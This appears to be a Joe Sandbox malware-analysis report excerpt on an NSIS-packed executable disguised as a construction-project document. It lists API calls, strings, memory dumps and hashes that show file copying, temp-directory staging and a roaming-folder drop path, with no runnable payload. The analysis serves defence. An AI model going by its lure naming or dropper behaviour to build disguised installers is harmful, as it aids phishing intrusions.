calls 5703->5704 5705 10002ab2 5704->5705

[Figure: Control-flow Graph, control_flow_graph 0 (40335a-4033f2); legend: Executed / Not Executed]
                                                                                                                          APIs
                                                                                                                          • #17.COMCTL32 ref: 00403379
                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                            • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406308
                                                                                                                            • Part of subcall function 004062F6: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 00406313
                                                                                                                            • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                            • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",00000000), ref: 004033DB
                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",?), ref: 00403403
                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                                                                                                          • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                                                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                                                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",00000000,?), ref: 00403698
                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",00000000,?), ref: 004036A4
                                                                                                                          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                                                                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,0041FEA8,00000001), ref: 00403725
                                                                                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                          • String ID: "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\incontemptible\koput$C:\Users\user\AppData\Roaming\incontemptible\koput\Losser$C:\Users\user\Desktop$C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                          • API String ID: 4107622049-1309350060
                                                                                                                          • Opcode ID: ba3fa22631945d2ec692421d63492d0888d6a8f757e4ac1530dcd8c095202370
                                                                                                                          • Instruction ID: 3f9bff4532b5a1f920197c5518436c484d8c06ab90e6dd2e991860da6f926746
                                                                                                                          • Opcode Fuzzy Hash: ba3fa22631945d2ec692421d63492d0888d6a8f757e4ac1530dcd8c095202370
                                                                                                                          • Instruction Fuzzy Hash: 1FC11770604210AAD720BF659D45A2B3EACEB45749F10483FF940B62D2D77D9D41CB7E

                                                                                                                          Control-flow Graph

                                                                                                                          [Control-flow graph not reproduced; first block 405373-40538e. Legend: Executed / Not Executed.]
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004053D1
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004053E0
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040541D
                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405424
                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405445
                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405456
                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405469
                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405477
                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040548A
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004054AC
                                                                                                                          • ShowWindow.USER32(?,?), ref: 004054C0
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054E1
                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054F1
                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040550A
                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405516
                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053EF
                                                                                                                            • Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405533
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005307,00000000), ref: 00405541
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405548
                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040556C
                                                                                                                          • ShowWindow.USER32(?,?), ref: 00405571
                                                                                                                          • ShowWindow.USER32(?), ref: 004055BB
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055EF
                                                                                                                          • CreatePopupMenu.USER32 ref: 00405600
                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405614
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405634
                                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040564D
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405695
                                                                                                                          • EmptyClipboard.USER32 ref: 0040569B
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004056A7
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004056B1
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004056C5
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056E5
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056F0
                                                                                                                          • CloseClipboard.USER32 ref: 004056F6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: {$&B
                                                                                                                          • API String ID: 590372296-2518801558
                                                                                                                          • Opcode ID: a9210c085025f7da69fa84600aad64b98492429c5a621f4d7bb2b68e6941663b
                                                                                                                          • Instruction ID: 4bfa3faa41321a0cadf5913ced3eb51c87a7cc043350d2f69421d7beec3be44d
                                                                                                                          • Opcode Fuzzy Hash: a9210c085025f7da69fa84600aad64b98492429c5a621f4d7bb2b68e6941663b
                                                                                                                          • Instruction Fuzzy Hash: 92B13971900208BFDB219F60DD89AAE7B79FB04354F00813AFA05BA1A0C7759E52DF69

                                                                                                                          Control-flow Graph

                                                                                                                          [Control-flow graph not reproduced; first block 405fae-405fb9. Legend: Executed / Not Executed.]
                                                                                                                          APIs
                                                                                                                          • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,?,0040526B,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 00406071
                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060EF
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406102
                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040613E
                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 0040614C
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00406157
                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617B
                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,?,0040526B,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 004061D5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 900638850-1989025593
                                                                                                                          • Opcode ID: 2de106b61b6886fe32187f800c53eea30337814e69c8c71d628fafc4fb074f05
                                                                                                                          • Instruction ID: 5cce0682863fafc60a16059ed1eb0c3d77be7ea2b31a2434558a531189329514
                                                                                                                          • Opcode Fuzzy Hash: 2de106b61b6886fe32187f800c53eea30337814e69c8c71d628fafc4fb074f05
                                                                                                                          • Instruction Fuzzy Hash: EA61D271A00115AADF209F25CC40AAF37A5EF54314F12813FE906BA2D1D73D99A2CB5E

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 0040583D
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbA563.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 00405885
                                                                                                                          • lstrcatW.KERNEL32(?,00409014,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 004058A8
                                                                                                                          • lstrlenW.KERNEL32(?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 004058AE
                                                                                                                          • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 004058BE
                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040595E
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040596D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsbA563.tmp$\*.*
                                                                                                                          • API String ID: 2035342205-535719329
                                                                                                                          • Opcode ID: f73c030cd55cfe5a8dab8208d1cd7d95fcf8e01722a7b63f144a17743666d228
                                                                                                                          • Instruction ID: 43b78ede77d9c0270a3625fa09dd856e9a99610c0d190015c3454e79d0f7c46c
                                                                                                                          • Opcode Fuzzy Hash: f73c030cd55cfe5a8dab8208d1cd7d95fcf8e01722a7b63f144a17743666d228
                                                                                                                          • Instruction Fuzzy Hash: A541C171900A15E6CB217B61CC49BAF7678EF81768F20817BF801B61D1D77C49829EAE
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNELBASE(?,00425738,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,00405B28,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 004062DA
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004062E6
                                                                                                                          Strings
                                                                                                                          • 8WB, xrefs: 004062D0
                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsbA563.tmp, xrefs: 004062CF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID: 8WB$C:\Users\user\AppData\Local\Temp\nsbA563.tmp
                                                                                                                          • API String ID: 2295610775-2094805136
                                                                                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                                          • Instruction ID: 1ee065d6e3812395a970a313fce2833205c85b6b9f4a8d8b1e1fbb38817291b4
                                                                                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                                          • Instruction Fuzzy Hash: BED0123198A030EBC20067786D0CC4B7A989B553317514ABAF426F63E0C7389C65969D
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                            • Part of subcall function 00405703: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                                            • Part of subcall function 00405703: CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                          • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3585118688-0
                                                                                                                          • Opcode ID: 02fa1bc128315b3629317a3bcc306fe2355556fdb58621b14dfff1a53f7edb22
                                                                                                                          • Instruction ID: a183927f8f084cdb8571cb7bd96d2202481db38f7d29b0955d5094ceef348c04
                                                                                                                          • Opcode Fuzzy Hash: 02fa1bc128315b3629317a3bcc306fe2355556fdb58621b14dfff1a53f7edb22
                                                                                                                          • Instruction Fuzzy Hash: EB116171900104EBCF109FA0CD459DF7AB5EB44359F20447BE501B61E1C3794A92DFAA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                                                                                          • Instruction ID: de185f48d860fff5590de95dd02018db6e9577308a0edf9c34ceb3d093010d57
                                                                                                                          • Opcode Fuzzy Hash: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                                                                                          • Instruction Fuzzy Hash: A7F18870D00269CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406308
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 00406313
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 310444273-0

                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                                                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                                                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                                                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                                                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                          • String ID: &B
                                                                                                                          • API String ID: 3282139019-3208460036

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406308
                                                                                                                            • Part of subcall function 004062F6: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 00406313
                                                                                                                            • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                                          • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 004039A0
                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\incontemptible\koput,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\incontemptible\koput,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\incontemptible\koput), ref: 00403A87
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                                                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
                                                                                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                                                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\incontemptible\koput$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                                                          • API String ID: 914957316-1031471537

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,00000400), ref: 00402DEC
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00402E35
                                                                                                                          • GlobalAlloc.KERNELBASE(?,00409230), ref: 00402F7C
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, xrefs: 00402DD6, 00402DE5, 00402DF9, 00402E16
                                                                                                                          • soft, xrefs: 00402EAC
